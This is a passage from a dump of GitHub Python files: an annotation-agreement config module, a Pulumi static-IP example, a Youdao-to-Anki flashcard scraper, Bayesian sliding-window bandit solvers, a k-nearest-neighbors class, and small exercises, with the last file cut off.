sys.stderr.write('ERROR: Path to the homogenised characters dataset does not exist.\\n')\n exit(0)\n\n # Load dataset\n X_train, y_train, X_test, y_test = load_dataset(args.dataset_path, args.width, args.height)\n\n # Normalise data - scale pixels\n X_train, X_test = normalise_data(X_train), normalise_data(X_test)\n\n # Load the model\n model = load_model(args.model_path)\n\n # Test the model\n _, acc = model.evaluate(X_test, y_test, verbose=0)\n print(f'Accuracy: > %.3f' % (acc * 100.0) + '%')\n\n\nif __name__ == '__main__':\n args = parse_arguments()\n\n if not os.path.isdir(args.dataset_path):\n sys.stderr.write('ERROR: Path to the homogenised characters dataset does not exist.\\n')\n exit(0)\n\n if not os.path.exists(args.model_path):\n sys.stderr.write('ERROR: Path for storing the trained model does not exist.\\n')\n exit(0)\n\n test()\n","repo_name":"sanjadeur/photomath","sub_path":"src/scripts/test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":2035,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"6542752814","text":"##############################################\n# IMPORT STATEMENTS\n##############################################\n\n# >>>> Native <<<<\nimport os\nimport sys\nimport json\nimport copy\nfrom json import loads\nfrom typing import Dict, List, Any, Tuple, Hashable, Iterable, Union\nfrom collections import defaultdict\n\n# >>>> Local <<<<\nfrom dummy_models import TypeDummyModel, BeliefStateDummyModel, PolicyDummyModel, SysDummyModel\n\n##############################################\n# CONFIG Dict\n#\n# The config dict describes all the data fields.\n# This is also the place to specify models and label types.\n#\n# Available label types:\n#\n# => \"multilabel_classification\" :: displays as checkboxes in front end\n#\n# => \"multilabel_classification_string\" :: displays as a checkbox and text input for string value. Used for\n# slot-value pairs.\n#\n# => \"multilabel_global_string\" :: same as multilabel_classification_string but global for the entire dialogue\n#\n# => \"string\" :: displays underneath the user utterance (indicated by label_type of \"data\")\n#\n#############################################\n\n##############################################\n# CODE\n##############################################\n\n\nclass Configuration(object):\n \"\"\"\n class responsible for configuration and valid annotation structure\n \"\"\"\n\n #importing json configuration file\n try: \n #docker\n with open('configuration/conf.json') as json_file:\n conf = json.load(json_file)\n __DEFAULT_PATH = \"configuration/\"\n except:\n #standalone\n with open('../../configuration/conf.json') as json_file:\n conf = json.load(json_file)\n __DEFAULT_PATH = \"../../configuration/\"\n\n # Here the list of annotation model file names\n annotation_styles = conf[\"app\"][\"annotation_models\"]\n\n # Dict where classifications are stored\n configDict = {}\n\n #accepted metaTags, this list can be customized\n metaTags = [\"collection\",\"status\",\"ID\"]\n\n for model in annotation_styles:\n with open(__DEFAULT_PATH+model) as style_file:\n configDict[model] = json.load(style_file)\n #convert back functions and classes from string \n for key,value in configDict[model].items():\n for sub_key,sub_value in value.items():\n if \"()\" in str(sub_value):\n configDict[model][key][sub_key] = eval(sub_value)\n\n @staticmethod\n def validate_dialogue(annotation_style, dialogue: List[Dict[str, Any]]) -> Union[str, List[Dict]]:\n \"\"\"\n validates the dialogue and makes sure it conforms to the configDict\n \"\"\"\n\n #print(dialogue[0])\n #if dialogue[0][\"collection\"]:\n # search = DatabaseManagement.readDatabase(\"dialogues_collections\", {\"id\":dialogue[0][\"collection\"]}, {\"_id\":0,\"annotationStyle\":1})\n # annotation_style = search[0][\"annotationStyle\"]\n\n try:\n for i, turn in enumerate(dialogue):\n\n for labelName, info in Configuration.configDict[annotation_style].items():\n\n try:\n turn[labelName]\n except KeyError:\n\n # turn 0 stores meta-tags and global slot\n if i == 0:\n continue\n #if (\"multilabel_global_string\" != info[\"label_type\"]):\n # continue\n\n if info[\"required\"]:\n message = (\"ERROR1: Label \\'{}\\' is listed as \\\"required\\\" in the \" \\\n \"config.py file, but is missing from the provided \" \\\n \"dialogue in turn {}.\".format(labelName, i))\n print(message, turn)\n return message\n\n if info[\"required\"] and not turn[labelName]:\n message = (\"ERROR2: Required label, \\'{}\\', does not have a value \" \\\n \"provided in the dialogue in turn {}\".format(labelName, i))\n print(message, turn)\n return message\n\n if info[\"required\"] and (\"multilabel_classification\" == info[\"label_type\"]):\n\n providedLabels = turn[labelName]\n\n if not all(x in info[\"labels\"] for x in providedLabels):\n message = \"ERROR3: One of the provided labels in the list: \" \\\n \"\\'{}\\' is not in allowed list according to \" \\\n \"config.py in turn {}\".format(providedLabels, i)\n print(message, turn)\n return message\n except:\n print(\"dialogue\",i,\"in list couldn't validate with the current annotation style model\")\n return\n\n return dialogue\n\n\n\n @staticmethod\n def create_annotation_dict(annotation_style):\n \"\"\"\n Generates a dictionary mapping label names to a dictionary of their description, label types\n and, if applicable, the possible values the label can take.\n \"\"\"\n out = {}\n\n for key,value in Configuration.configDict[annotation_style].items():\n\n temp = list(value[\"labels\"]) if value.get(\"labels\") else \"\"\n\n out[key] = {\n \"label_type\": value[\"label_type\"],\n \"labels\": temp,\n \"info\": value[\"description\"]\n }\n\n return out\n\n\n @staticmethod\n def create_empty_turn():\n \"\"\"\n creates an empty turn based on the configuration dictionary\n \"\"\"\n out = {}\n\n for key,value in Configuration.configDict.items():\n\n labelType = value[\"label_type\"]\n\n if labelType == \"data\":\n out[key] = query\n\n elif labelType == \"multilabel_classification\" or \\\n labelType == \"multilabel_global_string\" or \\\n labelType == \"multilabel_classification_string\":\n\n out[key] = []\n\n elif labelType == \"string\":\n\n out[key] = \"\"\n\n else:\n\n raise ValueError(\"The label type, {}, is not supported\"\n .format(labelType))\n\n return out\n\n\n##############################################\n# FUNCTIONS FOR FINDING THE ERRORS\n##############################################\n\n\ndef agreement_classification(listOfClassifications):\n \"\"\"\n computes, whether there is diagreement, the most likely prediction and confidences of each.\n \"\"\"\n countDict = { \"counts\" : defaultdict(float), \"predictions\" : set()}\n counter = 0\n\n errorFlag = False\n\n for prediction in listOfClassifications:\n\n counter += 1\n\n for label in prediction:\n\n countDict[\"counts\"][label] += 1\n\n if counter > 0:\n\n for key,value in countDict[\"counts\"].items():\n\n temp = value/counter\n\n countDict[\"counts\"][key] = temp\n\n if temp<1:\n\n errorFlag = True\n\n if errorFlag:\n for key,value in countDict[\"counts\"].items():\n\n if value>=0.5:\n\n countDict[\"predictions\"].add(key)\n\n countDict[\"predictions\"] = list( countDict[\"predictions\"] )\n return countDict\n\n else:\n return {}\n\n\n\n\n\ndef agreement_classification_string(listOfClassificationStrings):\n \"\"\"\n computes, whether there is diagreement, the most likely prediction and confidences of each.\n \"\"\"\n countDict = { \"counts\" : defaultdict(float), \"predictions\" : set()}\n\n valueDict = {}\n\n counter = 0\n\n errorFlag = False\n\n for prediction in listOfClassificationStrings:\n\n counter += 1\n\n for label in prediction:\n\n countDict[\"counts\"][label[0]] += 1\n\n temp = valueDict.get(label[0])\n\n if temp:\n if not (temp==label[1]):\n errorFlag = True\n else:\n valueDict[label[0]] = label[1]\n\n if counter > 0:\n\n for key,value in countDict[\"counts\"].items():\n\n temp = value/counter\n\n countDict[\"counts\"][key] = temp\n\n if temp<1:\n\n errorFlag = True\n\n\n if errorFlag:\n for key,value in countDict[\"counts\"].items():\n\n if value>=0.5:\n\n countDict[\"predictions\"].add(key)\n\n countDict[\"predictions\"] = [ (x,y) for x in countDict[\"predictions\"] for z,y in valueDict.items() if z==x]\n\n return countDict\n\n else:\n return {}\n\n\n\n\n\n\n##############################################\n# FUNCTIONS FOR CALCULATING THE SCORES\n##############################################\n\ndef agreement_classification_score(listOfClassifications, totalLabels):\n \"\"\"\n computes, whether there is diagreement, the most likely prediction and confidences of each.\n \"\"\"\n countDict = { \"counts\" : defaultdict(float), \"total\" : 0 , \"errors\":0, \"annotatedBy\" : 0, \"alpha\" : 0.0 , \"kappa\" : 0.0, \"accuracy\" : 0 }\n counter = 0\n\n #getting raw counts\n for prediction in listOfClassifications:\n\n counter += 1\n\n for label in prediction:\n\n countDict[\"counts\"][label] += 1\n\n countDict[\"annotatedBy\"] = counter\n\n #getting error, `alpha` and `kappa` -> slightly modified version of Fleiss Kappa & Krippendorff Alpha\n errorCount = 0\n totalLabel = 0\n for label, count in countDict[\"counts\"].items():\n\n totalLabel += 1\n\n if counter > count:\n\n errorCount += 1\n\n countDict[\"errors\"] = errorCount\n countDict[\"total\"] = totalLabel\n\n\n #kappa is calculated with uniform random probabilty for the chance\n A0 = (1 / (totalLabels * totalLabels ) )\n Ae = errorCount / totalLabels\n countDict[\"kappa\"] = (Ae-A0) / (1-A0)\n\n\n #A02\n countDict[\"accuracy\"] = errorCount/totalLabels\n\n return countDict\n\n\n\n##############################################\n# API to the outside world\n##############################################\n\nagreementConfig = {\n \"data\" : None,\n \"string\" : None,\n \"multilabel_classification\" : agreement_classification,\n \"multilabel_classification_string\" : agreement_classification_string,\n \"multilabel_global_string\" : agreement_classification_string\n}\n\nagreementScoreConfig = {\n \"data\" : None,\n \"string\" : None,\n \"multilabel_classification\" : agreement_classification_score,\n \"multilabel_classification_string\" : None,\n \"multilabel_global_string\" : None\n}\n","repo_name":"Wluper/matilda","sub_path":"web/server/annotator_config.py","file_name":"annotator_config.py","file_ext":"py","file_size_in_byte":10653,"program_lang":"python","lang":"en","doc_type":"code","stars":147,"dataset":"github-code","pt":"21"} +{"seq_id":"16712951484","text":"\"\"\"A Python Pulumi program\"\"\"\n\nimport zscaler_pulumi_zia as zia\n\nstaticIP = zia.ZIATrafficForwardingStaticIP(\"static-ip-example\",\n comment = \"Pulumi Static IP\",\n ip_address = \"121.234.54.105\",\n geo_override = True,\n\tlatitude = -36.848461,\n longitude = 174.763336,\n routable_ip = True,\n)","repo_name":"susanev/pulumi-zia","sub_path":"examples/python/zia_traffic_forwarding_static_ip/__main__.py","file_name":"__main__.py","file_ext":"py","file_size_in_byte":301,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43153873387","text":"import requests\nfrom bs4 import BeautifulSoup\n\n\ndef fetch_html(word: str) -> str:\n \"\"\"获取单词的整个 HTML 页面。\"\"\"\n url = \"https://www.youdao.com/result?word=\" + word + \"&lang=en\"\n response = requests.get(url)\n html = response.text\n return html\n\n\ndef extract_phonogram(html: str) -> str:\n \"\"\"从 HTML 页面中提取音标。\"\"\"\n soup = BeautifulSoup(html, \"html.parser\")\n\n def extract_original(phone_div):\n # 提取原式的音标字符串。\n phone = phone_div.find(\"span\", class_=\"phonetic\").text.strip(\" /\")\n\n # 将音标的斜线替换为中括号。\n return f\"[{phone.replace('/', '[').replace(' ', ']').replace('[', ' [')}]\"\n\n phone_divs = soup.find_all(\"div\", class_=\"per-phone\")\n eng_phone = extract_original(phone_divs[0])\n ame_phone = extract_original(\n phone_divs[1] if len(phone_divs) > 1 else phone_divs[0]\n )\n return f\"英 {eng_phone} 美 {ame_phone}\"\n\n\ndef extract_chinese(html: str) -> str:\n \"\"\"从 HTML 页面中提取中文释义。\"\"\"\n soup = BeautifulSoup(html, \"html.parser\")\n\n # 按词性分类的中文释义。\n chinese_meanings = soup.find_all(\"li\", class_=\"word-exp\")\n\n # 遍历每个词性。\n ret_list = []\n for meaning in chinese_meanings:\n pos = meaning.find(\"span\", class_=\"pos\")\n # 跳过人名。\n if pos is None:\n continue\n pos = pos.text.strip()\n trans = meaning.find(\"span\", class_=\"trans\").text.strip()\n\n my_class_map = {\n \"n.\": \"pos_n\",\n \"v.\": \"pos_v\",\n \"vi.\": \"pos_v\",\n \"vt.\": \"pos_v\",\n \"adj.\": \"pos_a\",\n }\n my_class = my_class_map.get(pos, \"pos_r\")\n ret_list.append(f'{pos}{trans}')\n\n return \"
\".join(ret_list)\n\n\ndef make_line(word: str) -> str:\n \"\"\"将单词转换为最终的行。\"\"\"\n html = fetch_html(word)\n phonogram = extract_phonogram(html)\n chinese = extract_chinese(html)\n return f\"{word}\\t{phonogram}\\t{chinese}\\t[sound:{word}.mp3]\"\n\n\ndef make_all_lines(words: list) -> str:\n \"\"\"将单词列表转换为可导入 Anki 的纯文本。\"\"\"\n ret = \"\"\n ret += \"# 由 UnnamedOrange 的制卡工具生成。\\n\"\n ret += \"# (1)英语单词\\t(2)英美音标\\t(3)中文释义\\t(4)英语发音\\n\"\n\n success = 0\n for word in words:\n try:\n ret += make_line(word) + \"\\n\"\n success += 1\n except Exception as e:\n print(f\"制卡 {word} 时出错:{e}\")\n\n print(f\"成功制卡 {success} 张,失败 {len(words) - success} 张。\")\n\n return ret\n\n\ndef main():\n print(\"请输入单词,一行一个,以空行结束:\")\n words = []\n while True:\n word = input()\n if word == \"\":\n break\n words.append(word)\n\n with open(\"Anki.txt\", \"w\", encoding=\"utf-8\") as f:\n f.write(make_all_lines(words))\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"UnnamedOrange/Anki-Cards","sub_path":"English/scripts/text.py","file_name":"text.py","file_ext":"py","file_size_in_byte":2967,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"10835675388","text":"from typing import List\nimport numpy as np\nfrom Classes_RL.Utilities import Utilities\nfrom Classes_RL.Bandit import Bandit\nfrom Classes_RL.Interfaces import Solver\nfrom Classes_RL.Results_solver import ResultsSolver\n\nclass Sliding(Solver):\n\n mu_bar: np.ndarray\n tau_bar: np.ndarray\n var_bar: np.ndarray\n window: int\n optimistic_Q: float\n var_0: float\n results_solver: ResultsSolver\n n: int\n N: np.ndarray\n P: np.ndarray\n\n def __init__(self, bandits: List[Bandit], oracle_data, n_iteration, n_episode):\n\n self.bandits = bandits\n self.oracle_data = oracle_data\n\n self.a = len(self.bandits)\n self.A = np.arange(self.a)\n\n self.n_iteration = n_iteration\n self.n_episode = n_episode\n self.n_action = len(bandits)\n\n self.results_solver = ResultsSolver(bandits, n_iteration, n_episode)\n\n def run(self):\n\n self.reset()\n self.results_solver.start()\n\n for i in range(self.n_episode):\n\n self.episode = i\n\n for k in range(self.n_iteration):\n\n self.iteration = k\n\n a, r = self.pull(k=k)\n\n # self.results_solver.P_cum[i, k] = self.N / self.n\n # self.results_solver.P[i, k] = Utilities.softmax_temperature(self.Q)\n\n self.results_solver.P_action[i, k] = self.N / self.n\n self.results_solver.P[i, k] = self.P\n\n self.results_solver.reward[i, k] = r\n self.results_solver.regret[i, k] = self.oracle_data[\"max_reward\"][k] - r\n self.results_solver.action[i, k] = a\n\n self.results_solver.Q[i, k] = self.mu_bar\n self.results_solver.Q_mean[i, k] = self.Q_mean\n self.results_solver.Q_mean_weighted[i, k] = np.average(self.results_solver.Q[i, k], weights=self.P)\n\n\n # just idea\n self.results_solver.regret_a[i, k] = np.mean((self.oracle_data[\"mu_known\"][k] - self.mu_bar) ** 2)\n\n # Error\n self.results_solver.cross_entropy[i, k] = Utilities.cross_entropy(p=self.oracle_data[\"P_action\"][k], q=self.results_solver.P_action[i, k])\n self.results_solver.ae[i, k] = np.abs(self.oracle_data[\"Q_mean_weighted\"][k] - self.results_solver.Q_mean_weighted[i, k])\n\n self.results_solver.mu_bar[i, k] = self.mu_bar\n self.results_solver.tau_bar[i, k] = self.tau_bar\n self.results_solver.var_bar[i, k] = self.var_bar\n\n self.results_solver.action_total[i] = self.N\n self.results_solver.cum_reward[i] = np.cumsum(self.results_solver.reward[i, :])\n self.results_solver.cum_regret[i] = np.cumsum(self.results_solver.regret[i, :])\n self.results_solver.cum_cross_entropy[i] = np.cumsum(self.results_solver.cross_entropy[i, :])\n self.results_solver.cum_ae[i] = np.cumsum(self.results_solver.ae[i, :])\n\n # just idea\n self.results_solver.cum_regret_a[i] = np.cumsum(self.results_solver.regret_a[i, :])\n\n self.reset()\n\n results, results_mean = self.results_solver.end()\n\n return results, results_mean\n\n def pull(self, k):\n\n # Select action\n a = self.select_action()\n\n # Get the reward for the current action and best action\n r = self.bandits[a].get_reward(iteration=self.n)\n\n # Update action count\n self.n += 1\n self.N[a] += 1\n\n # Update Q\n self.update_Q(a=a, r=r)\n\n return a, r\n\n def reset(self):\n\n self.n = 0 # Number of total step\n self.N = np.zeros(self.n_action) # Number of step for each action\n\n # Q-value\n self.Q_mean = 0\n\n # Bayesian stuff\n self.mu_bar = np.zeros(shape=self.a) + self.optimistic_Q\n self.var_bar = np.ones(shape=self.a) * self.var_0 # initial variance\n self.tau_bar = np.ones(shape=self.a) * 1. / self.var_bar # the posterior precision\n\nclass BayesianSlidingWindowUMKV(Sliding):\n\n hyperparameters: dict\n solver_name: str\n is_stationary: bool\n t = int\n optimistic_Q: int\n window: int\n var_bar_known: list\n\n def set_hyperparameters(self, hyperparameters):\n\n self.hyperparameters = hyperparameters\n self.solver_name = hyperparameters[\"solver_name\"]\n self.t = hyperparameters[\"temperature\"]\n self.optimistic_Q = hyperparameters[\"optimistic_Q\"]\n self.window = hyperparameters[\"window\"]\n self.var_0 = hyperparameters[\"initial_var\"]\n\n def update_Q(self, a, r):\n\n ''' increase the number of times this socket has been used and improve the estimate of the\n value (the mean) by combining the new value 'x' with the current mean '''\n\n # Update Bayesian model\n if self.iteration < self.window:\n\n # Update the mean of the posterior\n numerator = (self.tau_bar[a] * self.mu_bar[a]) + (self.N[a] * r)\n denominator = self.tau_bar[a] + self.N[a]\n self.mu_bar[a] = numerator / denominator\n\n # Increase the sum the precision\n tau = 1 # Considering the same precision in the data\n self.tau_bar[a] = self.N[a] * tau\n self.var_bar[a] = 1 / self.tau_bar[a] # Variance based on the precision (Variance for the sampling\n self.Q_mean = self.Q_mean + (1 / self.n) * (r - self.Q_mean)\n\n else: # Specific for the past n observation\n\n # Reset observation and set the first values as the values already in mu as the first values\n mu = self.results_solver.mu_bar[self.episode, self.iteration - self.window, :].copy()\n Q_mean_w = self.results_solver.Q_mean[self.episode, self.iteration - self.window].copy()\n # mu = np.zeros(self.n_action) + self.optimistic_Q\n self.tau_bar = np.ones(shape=self.a) * 1 / self.var_0\n self.var_bar = np.ones(shape=self.a) * 1. / self.tau_bar\n self.n_w = 0.\n self.N_w = np.zeros(self.a)\n\n for w in range(self.iteration - self.window + 1, self.iteration):\n\n # Get past action and reward\n a_w = int(self.results_solver.action[self.episode, w])\n r_w = self.results_solver.reward[self.episode, w]\n\n # Update action count\n self.N_w[a_w] += 1\n self.n_w += 1\n\n # Update the mean of the posterior\n numerator = (self.tau_bar[a_w] * mu[a_w]) + (self.N_w[a_w] * r_w)\n denominator = self.tau_bar[a_w] + self.N_w[a_w]\n mu[a_w] = numerator / denominator\n\n # Increase the sum the precision\n tau = 1 # Considering the same precision in the data\n self.tau_bar[a_w] = self.N_w[a_w] * tau\n self.var_bar[a_w] = 1 / self.tau_bar[a_w] # Variance based on the precision (Variance for the sampling\n\n Q_mean_w = Q_mean_w + (1. / self.n_w) * (r_w - Q_mean_w)\n\n self.N_w[a] += 1\n self.n_w += 1\n self.mu_bar = mu\n self.Q_mean = Q_mean_w + (1. / self.n_w) * (r - Q_mean_w)\n\n # Update the mean of the posterior\n numerator = (self.tau_bar[a] * self.mu_bar[a]) + (self.N[a] * r)\n denominator = self.tau_bar[a] + self.N[a]\n self.mu_bar[a] = numerator / denominator\n\n # Increase the sum the precision\n tau = 1 # Considering the same precision in the data\n self.tau_bar[a] = self.N[a] * tau\n self.var_bar[a] = 1 / self.tau_bar[a]\n\n def select_action(self):\n\n values = []\n\n for i in range(self.a):\n temp = np.random.normal(self.mu_bar[i], np.sqrt(1 / self.tau_bar[i])) # use precision for sampling (Bad for static behavior since the variance become smaller, smaller ....)\n if temp < 0: # We want positive value only\n temp = 0\n values.append(temp)\n values = np.array(values)\n values = np.nan_to_num(values, neginf=0.00001, posinf=0.00001, nan=0.00001)\n\n self.P = Utilities.softmax_temperature(x=values, t=self.t)\n a = np.random.choice(self.A, p=self.P)\n\n return a\n\nclass BayesianSlidingWindowUMUV(Sliding):\n\n hyperparameters: dict\n solver_name: str\n is_stationary: bool\n t = int\n optimistic_Q: int\n window: int\n var_bar_known: list\n\n def set_hyperparameters(self, hyperparameters):\n\n self.hyperparameters = hyperparameters\n self.solver_name = hyperparameters[\"solver_name\"]\n self.t = hyperparameters[\"temperature\"]\n self.optimistic_Q = hyperparameters[\"optimistic_Q\"]\n self.window = hyperparameters[\"window\"]\n self.var_0 = hyperparameters[\"initial_var\"]\n\n # Gaussian part for unknown mean and unknown variance (normal - gamma)\n self.alpha = np.ones(shape=self.a) * hyperparameters[\"alpha_g\"] # gamma shape parameter\n self.beta = np.ones(shape=self.a) * hyperparameters[\"beta_g\"] # gamma rate parameter\n\n self.alpha_g = np.ones(shape=self.a) * hyperparameters[\"alpha_g\"]\n self.beta_g = np.ones(shape=self.a) * hyperparameters[\"beta_g\"]\n\n def update_Q(self, a, r):\n\n ''' increase the number of times this socket has been used and improve the estimate of the\n value (the mean) by combining the new value 'x' with the current mean '''\n\n self.Q_mean = self.Q_mean + (1 / self.window) * (r - self.Q_mean)\n\n v = self.N[a]\n n = 1\n\n if self.iteration < self.window:\n\n # Update the mean of the posterior\n\n self.alpha[a] = self.alpha[a] + n / 2\n\n numerator = n * v * (r - self.mu_bar[a]) ** 2\n denominator = (v + n) * 2\n\n self.beta[a] = self.beta[a] + numerator / denominator\n\n # # estimate the variance - calculate the mean from the gamma\n # self.var[a] = self.beta[a] / (self.alpha[a] * v)\n # self.tau[a] = 1 / self.var[a]\n\n numerator_mu = v * self.mu_bar[a] + n * r\n denominator_mu = v + n\n self.mu_bar[a] = numerator_mu / denominator_mu\n\n # Specific for the past n observation\n else:\n\n # Reset observation and set the first values as the values already in mu as the first values\n mu = self.results_solver.mu_bar[self.episode, self.iteration - self.window, :].copy()\n Q_mean_w = self.results_solver.Q_mean[self.episode, self.iteration - self.window].copy()\n # mu = np.zeros(self.n_action) + self.optimistic_Q\n self.alpha = self.alpha_g.copy()\n self.beta = self.beta_g.copy()\n self.n_w = 0.\n self.N_w = np.zeros(self.a)\n\n for w in range(self.iteration - self.window + 1, self.iteration):\n\n # Get past action and reward\n a_w = int(self.results_solver.action[self.episode, w])\n r_w = self.results_solver.reward[self.episode, w]\n\n # Update action count\n self.N_w[a_w] += 1\n self.n_w += 1\n v = self.N_w[a]\n\n self.alpha[a_w] = self.alpha[a_w] + n / 2\n\n numerator = n * v * (r_w - mu[a_w]) ** 2\n denominator = (v + n) * 2\n\n self.beta[a_w] = self.beta[a_w] + numerator / denominator\n\n # estimate the variance - calculate the mean from the gamma\n # self.var[a_w] = self.beta[a_w] / (self.alpha[a_w] * v)\n # self.tau[a_w] = 1 / self.var[a_w]\n\n numerator_mu = v * mu[a_w] + n * r_w\n denominator_mu = v + n\n mu[a_w] = numerator_mu / denominator_mu\n\n Q_mean_w = Q_mean_w + (1. / self.n_w) * (r_w - Q_mean_w)\n\n self.N_w[a] += 1\n self.n_w += 1\n self.mu_bar = mu\n self.Q_mean = Q_mean_w + (1. / self.n_w) * (r - Q_mean_w)\n\n # Update the mean of the posterior\n\n self.alpha[a] = self.alpha[a] + n / 2\n\n numerator = n * v * (r - self.mu_bar[a]) ** 2\n denominator = (v + n) * 2\n\n self.beta[a] = self.beta[a] + numerator / denominator\n\n numerator_mu = v * self.mu_bar[a] + n * r\n denominator_mu = v + n\n self.mu_bar[a] = numerator_mu / denominator_mu\n\n def select_action(self):\n\n values = []\n\n for i in range(self.a):\n\n precision = np.random.gamma(self.alpha[i], 1 / self.beta[i]) # shape = 1/rate (beta is rate)\n\n if precision == 0 or self.n == 0:\n precision = 0.001\n\n # estimate the variance - calculate the mean from the gamma\n self.tau_bar[i] = precision\n self.var_bar[i] = 1 / precision\n\n temp = np.random.normal(self.mu_bar[i], np.sqrt(1 / precision))\n\n if temp < 0: # We want positive value only\n temp = 0\n\n values.append(temp)\n\n values = np.array(values)\n values = np.nan_to_num(values, neginf=0.00001, posinf=0.00001, nan=0.00001)\n\n self.P = Utilities.softmax_temperature(x=values, t=self.t) # Can be interesting to have more exploration\n a = np.random.choice(self.A, p=self.P)\n\n return a","repo_name":"KentaKamikokuryo/Bandits_AAE_Handrecognition","sub_path":"Python/Classes_RL/Bayesian_sliding_solver.py","file_name":"Bayesian_sliding_solver.py","file_ext":"py","file_size_in_byte":13303,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"73233854451","text":"def location_Player(keyinput, board):\n dic = {\n \"left\" : (-1,0),\n \"up\" : (0,1),\n \"down\" : (0,-1),\n \"right\" : (1,0),\n }\n x,y = 0,0\n lr, ud = board\n lr//=2\n ud//=2\n for key in keyinput:\n dx,dy = dic[key]\n x += dx\n y += dy\n x=max(-lr,x)\n y = max(-ud,y)\n x = min(lr,x)\n y = min(ud,y)\n answer = [x,y]\n return answer","repo_name":"YH-LEE21/Python_Programmers","sub_path":"Level_0/캐릭터의 좌표/solution.py","file_name":"solution.py","file_ext":"py","file_size_in_byte":414,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"72501649012","text":"import numpy as np\nfrom sklearn.utils.extmath import safe_sparse_dot as safedot\nfrom ..Utilities.utils import Kernel\n\n# import os\n# print(os.getcwd())\n# import sys\n# sys.exit(1)\n\nclass NearestNeighbors():\n \"\"\"\n This class implements the k-nearest neighbors algorithm using\n both kernelized and standard distance metrics\n \"\"\"\n\n\n def l1_distance(self, X, x):\n \"\"\"\n Computes the Manhattan distance between a single feature observation from testing\n data and each observation from training data\n\n Parameters\n ----------\n X : N x D matrix consisting of N observations of data\n x : D x 1 vector consisting of a single observation\n\n Returns\n -------\n N x 1 vector of distances between x and each observation in X\n \"\"\"\n\n raw_dist = np.abs(X - x)\n return np.sum(raw_dist, axis = 1)\n\n\n def l2_distance(self, X, x, gen_dist, kernel, **kwargs):\n \"\"\"\n Computes Euclidean distance between a single feature observation from testing\n data and each observation from training data\n\n Parameters\n ----------\n X : N x D matrix consisting of N observations of data\n x : D x 1 vector consisting of a single observation\n gen_dist : pre computed squared norm of each row vector in X\n kernel : function that will apply a pseudo projection of the features into a space\n of different dimensions\n\n Returns\n -------\n N x 1 vector of distances between x and each observation in X\n \"\"\"\n\n if kernel is None:\n t_1 = gen_dist\n t_2 = safedot(x, x)\n t_3 = 2 * safedot(X, x)\n return t_1 + t_2 - t_3\n else:\n distances = np.zeros(X.shape[0])\n for i in range(X.shape[0]):\n t_2 = kernel(x, x, **kwargs)\n t_3 = kernel(X[i], x, **kwargs)\n distances[i] = gen_dist[i] + t_2 - (2 * t_3)\n return distances\n\n\n def lp_distance(self, X, x, p = 3):\n \"\"\"\n Computes the Minkowski distance between a single feature observation from testing\n data and each observation from training data\n\n Parameters\n ----------\n X : N x D matrix consisting of N observations of data\n x : D x 1 vector consisting of a single observation\n\n Returns\n -------\n N x 1 vector of distances between x and each observation in X\n \"\"\"\n\n abs_dist = np.abs(X - x)\n nth_dist = np.sum(np.power(abs_dist, p), axis = 1)\n distances = np.power(nth_dist, (1 / p))\n return distances\n\n\n def min_distances(self, distances, y, k):\n \"\"\"\n Given the distance between each training observation and a given\n testing observation, computes the predicted label for the testing observation based\n off the median of label of the k nearest neighbors\n\n Parameters\n ----------\n distances : N x 1 vector of distances between each training observation and a\n certain testing observation\n y : labels of each training observation\n k : number of nearest neighbors to compare to the testing observation\n\n Returns\n -------\n median of the labels of the k nearest neighbors. If there is a tie, k will be\n decreased by one until the die is broken\n \"\"\"\n\n while k > 0:\n min_distances = np.argpartition(distances, k)[:k]\n labels = y[min_distances]\n prediction = np.median(labels)\n if prediction.is_integer() or k == 1:\n return prediction\n else:\n k -= 1\n return prediction\n\n\n def classify(self, X_train, y_train, X_test, k = 3, dist_func = \"l2\", p = 3, kernel = None, **kwargs):\n \"\"\"\n Classifies a given matrix or feature vector of testing data by assigning\n each new feature a label based on the labels of the k nearest neighbors\n\n Parameters\n ----------\n X_train : N x D matrix consisting of N observations of training data\n y_train : N x 1 vector consisting of N labels, where each corresponds to \n the feature vector of X_train at the same index\n X_test : M x D vector consisting of a M observations of testing data\n k : number of nearest neighbors to compare to each testing observation\n dist_func : metric that determines distance between two vectors\n p : parameter used in l3 distance function\n kernel : function that will apply a pseudo projection of the features into a space\n of different dimensions\n kwargs : parameters specific to kernelized k nearest neighbors. See utils for more information\n\n Returns\n -------\n predictions of the labels for each feature vector in X_test\n\n Note\n ----\n The use of a kernel will only work if the given distance function is l2_distance \n \"\"\"\n\n func_map = {'l1': self.l1_distance, 'l2': self.l2_distance, 'lp' : self.lp_distance}\n\n kern = Kernel()\n kernel_map = {'rbf': kern.gaussian, 'polynomial' : kern.polynomial, 'sigmoid' : kern.sigmoid}\n\n if dist_func == 'l2':\n gen_dist = np.sum(X_train * X_train, axis = 1)\n\n if kernel:\n gen_dist = np.zeros(X_train.shape[0])\n for i in range(X_train.shape[0]):\n gen_dist[i] = kernel_map[kernel](X_train[i], X_train[i], **kwargs)\n\n pred = np.zeros(X_test.shape[0])\n for i in range(X_test.shape[0]):\n if dist_func == 'l2':\n if kernel == None:\n distances = func_map[dist_func](X_train, X_test[i], gen_dist, kernel)\n\n else:\n distances = func_map[dist_func](X_train, X_test[i], gen_dist, kernel_map[kernel] , **kwargs)\n\n elif dist_func == 'lp':\n distances = func_map[dist_func](X_train, X_test[i], p = p)\n\n else :\n distances = func_map[dist_func](X_train, X_test[i])\n\n pred[i] = self.min_distances(distances, y_train, k)\n return pred\n\n\n","repo_name":"AustenSchunk/MachineLearningLibrary","sub_path":"libml/Models/NearestNeighbors.py","file_name":"NearestNeighbors.py","file_ext":"py","file_size_in_byte":6153,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"26556654087","text":"class Node:\n def __init__(self, data, next=None):\n self.data = data\n self.next = next\n\n\nclass LinkedList:\n def __init__(self, head=None, tail=None):\n self.head = head\n self.tail = tail\n\n def add(self, data):\n newNode = Node(data)\n current = self.head\n if self.head:\n while current.next is not self.head:\n current = current.next\n current.next = newNode\n tail = newNode\n tail.next = newNode\n newNode.next = 